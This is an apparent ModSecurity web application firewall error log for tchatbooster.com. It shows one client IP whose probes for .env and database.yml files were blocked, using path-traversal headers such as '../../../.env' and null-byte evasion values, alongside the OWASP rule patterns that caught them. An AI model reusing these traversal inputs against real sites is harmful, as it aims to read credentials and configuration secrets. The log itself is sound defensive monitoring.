[Tue May 12 04:39:21.766851 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2QgpmE1yW0glLdgfNQAAAMY"]
[Tue May 12 04:39:21.767076 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2QgpmE1yW0glLdgfNQAAAMY"]
[Tue May 12 04:39:21.767133 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2QgpmE1yW0glLdgfNQAAAMY"]
[Tue May 12 04:39:21.767167 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2QgpmE1yW0glLdgfNQAAAMY"]
[Tue May 12 04:39:21.767575 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2QgpmE1yW0glLdgfNQAAAMY"]
[Tue May 12 04:39:22.096198 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS2dr1yOh9TvizeziP0wAAAFY"], referer: https://tchatbooster.com/.env.example
[Tue May 12 04:39:22.175243 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS2dr1yOh9TvizeziP1AAAAFQ"]
[Tue May 12 04:39:22.189184 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/app/.env"] [unique_id "agKS2no6NvB9WXx5V-6e3gAAAQ8"]
[Tue May 12 04:39:22.189323 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/.env"] [unique_id "agKS2no6NvB9WXx5V-6e3gAAAQ8"]
[Tue May 12 04:39:22.740189 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS2QgpmE1yW0glLdgfNQAAAMY"]
[Tue May 12 04:39:22.758110 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS2tr1yOh9TvizeziP1wAAAFQ"]
[Tue May 12 04:39:22.758301 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS2tr1yOh9TvizeziP1wAAAFQ"]
[Tue May 12 04:39:22.763090 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2s1tk6y7yBJLpJoprgAAAII"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:22.763141 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2s1tk6y7yBJLpJoprgAAAII"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:22.763166 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2s1tk6y7yBJLpJoprgAAAII"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:22.763192 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2s1tk6y7yBJLpJoprgAAAII"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:22.763384 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2s1tk6y7yBJLpJoprgAAAII"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:22.763434 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2s1tk6y7yBJLpJoprgAAAII"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:22.763478 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2s1tk6y7yBJLpJoprgAAAII"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:22.763871 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 31)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS2s1tk6y7yBJLpJoprgAAAII"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:22.978802 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS2no6NvB9WXx5V-6e3gAAAQ8"]
[Tue May 12 04:39:22.997758 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKS2s1tk6y7yBJLpJopsAAAAIw"], referer: https://tchatbooster.com/app/.env
[Tue May 12 04:39:22.997942 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKS2s1tk6y7yBJLpJopsAAAAIw"], referer: https://tchatbooster.com/app/.env
[Tue May 12 04:39:23.058759 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKS23o6NvB9WXx5V-6e4AAAAQ8"]
[Tue May 12 04:39:23.059010 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKS23o6NvB9WXx5V-6e4AAAAQ8"]
[Tue May 12 04:39:23.534029 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS2tr1yOh9TvizeziP1wAAAFQ"]
[Tue May 12 04:39:23.552850 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS29r1yOh9TvizeziP2gAAAFY"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:23.553084 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS29r1yOh9TvizeziP2gAAAFY"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:23.575050 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 31 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS2s1tk6y7yBJLpJoprgAAAII"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:23.597107 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS29r1yOh9TvizeziP2wAAAFQ"]
[Tue May 12 04:39:23.597165 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS29r1yOh9TvizeziP2wAAAFQ"]
[Tue May 12 04:39:23.597192 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS29r1yOh9TvizeziP2wAAAFQ"]
[Tue May 12 04:39:23.597411 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS29r1yOh9TvizeziP2wAAAFQ"]
[Tue May 12 04:39:23.597447 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS29r1yOh9TvizeziP2wAAAFQ"]
[Tue May 12 04:39:23.597861 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS29r1yOh9TvizeziP2wAAAFQ"]
[Tue May 12 04:39:23.794597 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS2s1tk6y7yBJLpJopsAAAAIw"], referer: https://tchatbooster.com/app/.env
